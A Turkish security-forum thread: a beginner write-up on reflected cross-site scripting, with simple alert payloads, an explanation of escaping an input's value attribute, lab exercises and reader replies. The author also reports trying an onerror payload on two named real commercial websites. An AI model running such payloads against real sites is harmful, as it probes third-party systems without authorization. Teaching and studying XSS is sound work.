Cross Site Scripting (REFLECTED)

[H A]

Selamlar ben Halil AHMAD.
Türkçe tabiriyle (Siteler arası betik çalıştırma) olan xss açığından bahsedeceğim.
Direk satırlarca yazı yazmak yerine ufak işlevli method’lar göstereceğim sizlere.Bugünki write-up reflected xss üzerine olacaktır.
Sizlere şöyle bi görsel bırakmak istiyorum umarım faydası olabilir.Evrensel olarak xss’yi anlatmaktadır.
Dipnot: Zafiyet testlerini mümkün olduğunca Mozilla’da yapmaya çalışın.

Lab’lar üzerinden gideceğim.Farklı farklı Lab’lara geçeceğim.
XSS Practice Lab - 1 Şimdi buraya yazalım işte
Payload’lar;

<script>alert(“halil”)</script>
“><script>alert(1)</script>
<script>alert(1)</script>

Örnek olarak mesela bunlar daha binlerce gösterebilirim fakat uzamasın.
Payload’lar;

<script>alert(halil)</script>
<script>alert(halil)<script>

Aslında çalışanları ve çalışmayanların neden çalışmadığını neden çalıştığını açıklayacaktım fakat şöyle birşey söyleyeyim;

</div>
					<center><form action="stg_3.php" method="GET">
					<h2>Welcome to Challenge 3</h2><br>
					<font size=3>Enter Your Name here : <input type="text" name="name" value="<script>alert(1)</script>"></input>
					<input type="submit" name="submit" value="Search">
					</form>
					</center>
				</div>
			</div>
<font size=3>Enter Your Name here : <input type="text" name="name" value="<script>alert(1)</script>"></input>

Evet gördüğünüz gibi <script>alert(“)</script> çalışmama nedeni bariz ortada.

Şimdi xss ararken düz payload’lar deniyorsunuz yanlış yapıyorsunuz.
<div
<title
<strong
……..
Binlerce şekilde açılmış search’lar var bunları <script>alert(1)</script> okumamasının nedeni örnek <div ile açılmasından dolayı.Eğer bizde payload’ımızı <div ile açarsak;
<div><script>alert(1)</script></div> (Source’ye bağlı kapatıp kapatmayacağınız.
TESTLERİMİZE GEÇELİM;
Payload: “><img src=x onerror=alert(1)>
Web Sayfası: XSS Practice Lab - 1
PoC:

Payload:”><img src=x onerror=alert(“halilahmad”)>
Web Sayfası: https://www.mini.de/
PoC:

Payload:”><img src=x onerror=alert(1)>
Web Sayfası: https://ca-stores.casper.com/
PoC:

Yani arkadaşlar xss ararken çok kurnaz olmanız gerekmektedir gözleriniz hep giden url’lerde giden paketlerde get komutlarında cart curt herşeyde olmalıdır.Bu arada shadon’da tavsiye ederim fakat Brup kullanın işinize çok yarayacaktır.
Reflected ararken dikkat edilmesi gerekenler;
Source’ye bakılmalı.
Doğru payload.
2 si sizi sonuca götürecektir.Ha bide bypass’lar var flitreleme onları başka write-up’da yayımlarım.
KAYNAK: https://medium.com/@halilahmad/cross-site-scripting-reflected-1dc90662875e​

 

[DarkHawk06]

Daha konuya girmeden konuyu kesin @HA açmıştır dedim. Eline sağlık kardeşim. Gayet guzel açıklamışsın.
Edit: Manuel xss aramak yerine otomatik yapabileceğimiz yöntem var mı?

 

[H A]

Daha konuya girmeden konuyu kesin @HA açmıştır dedim. Eline sağlık kardeşim. Gayet guzel açıklamışsın.
Edit: Manuel xss aramak yerine otomatik yapabileceğimiz yöntem var mı?

Teşekkür ederim.
Öncelikle bu mükemmel sorun için sana teşekkür ederim.Evet oto arayan tool'lar var fakat tool adı üstünde coder'in sınırladığı yaptığı txt dosyası kadar kapasitesi... yani %100 doğru bi sonuç vermez tool'lar ama yardımcı olurlar örneğin brup;tool ile araya giriyorsun yani bi nevi yıllar önceki shell yüklemek için kullanılan tamperdata yöntemi gibi birşey düşün sen anlarsın.
Tavsiyem her zaman manueldir,çünkü xss ararken en saf en dibe inmemiz gerekir.Şirketlerin ön yüze çalıştığı aşikar,zaten bulunan güvenlik açıklarıda " site.com " da değilde sublarında bulunuyor veyahut site.com/test/test1/test gibi yerlerde bunu da tool bulamaz ama isterseniz sizin için tool'ları derleyebilirim.

 

[DarkMonster60]

Ellerine sağlık.
manuel zafiyet ararken herhangi bir starateji kullanıyor musun ?
konuların devamını bekliyorum dostum.

 

[codexhuntress]

Yine çok iyi anlatmışsın eline sağlık

 

[DarkHawk06]

Teşekkür ederim.
Öncelikle bu mükemmel sorun için sana teşekkür ederim.Evet oto arayan tool'lar var fakat tool adı üstünde coder'in sınırladığı yaptığı txt dosyası kadar kapasitesi... yani %100 doğru bi sonuç vermez tool'lar ama yardımcı olurlar örneğin brup;tool ile araya giriyorsun yani bi nevi yıllar önceki shell yüklemek için kullanılan tamperdata yöntemi gibi birşey düşün sen anlarsın.
Tavsiyem her zaman manueldir,çünkü xss ararken en saf en dibe inmemiz gerekir.Şirketlerin ön yüze çalıştığı aşikar,zaten bulunan güvenlik açıklarıda " site.com " da değilde sublarında bulunuyor veyahut site.com/test/test1/test gibi yerlerde bunu da tool bulamaz ama isterseniz sizin için tool'ları derleyebilirim.

Tek kelimeyle harika anlatım yaptığınız için şükranlarımı sunarım. Isterseniz araçları bir konu altında paylaşabilirsiniz. Böylece benim gibi bilgiye aç arkadaşlarla beraber öğrenmiş oluruz. Kesinlikle haklısınız. Ön yüze çalıştıkları için önde pek bulunmuyor. Genellikle android üzerine çalışma yapıyorum. Kaynak ararken bazen bloglarda şans eseri xss bulduğum oluyor. Bu arada gerçekten başarılı bir arkadaşımızsın. Konularını severek okuyorum.

 

[H A]

Ellerine sağlık.
manuel zafiyet ararken herhangi bir starateji kullanıyor musun ?
konuların devamını bekliyorum dostum.

Teşekkürler,dediğim gibi kurnaz olacaksın a yı çıkarıp b eklediğinde ne olacağını gözlemlemen gerekli Lab'lar ile veya dvwa tecrübeler edinmen gerekir.Konular devam edecektir.

Yine çok iyi anlatmışsın eline sağlık

Teşekkürler,matlab'cı

Tek kelimeyle harika anlatım yaptığınız için şükranlarımı sunarım. Isterseniz araçları bir konu altında paylaşabilirsiniz. Böylece benim gibi bilgiye aç arkadaşlarla beraber öğrenmiş oluruz. Kesinlikle haklısınız. Ön yüze çalıştıkları için önde pek bulunmuyor. Genellikle android üzerine çalışma yapıyorum. Kaynak ararken bazen bloglarda şans eseri xss bulduğum oluyor. Bu arada gerçekten başarılı bir arkadaşımızsın. Konularını severek okuyorum.

Teşekkürler,tabiki bilgi paylaştıkça güzelleşir.Android üzerinde de çok açık var çoğu hunter web odaklı çalışmaktadır,android üzerinden bakarsanız mantığı çözerseniz emin olun 2 kat 3 kat fazla bounty alırsınız.Mütevazi yorumunuz beni çok mutlu etti,şu sıralar yoğunluktan dolayı 2-3 günde 1 makle yayınlamaktayım.Web sitemi hazırlıyorum hazırlandıktan sonra konulara ordan devam edeceğim.

 

[randomusername1234]

Güzel konu olmuş eline sağlık

 

[H A]

Güzel konu olmuş eline sağlık

Teşekkürler,kolay gelsin herkese.

 

[RedPhospour]

Elinize sağlık faydalı bir içerik olmuş.

 

['Saruca]

Ellerinize sağlık hocam. )

 

[M3m0ry]

Ellerine sağlık reis cidden başarılı konu

 

[H A]

Teşekkürler,kolay gelsin herkese.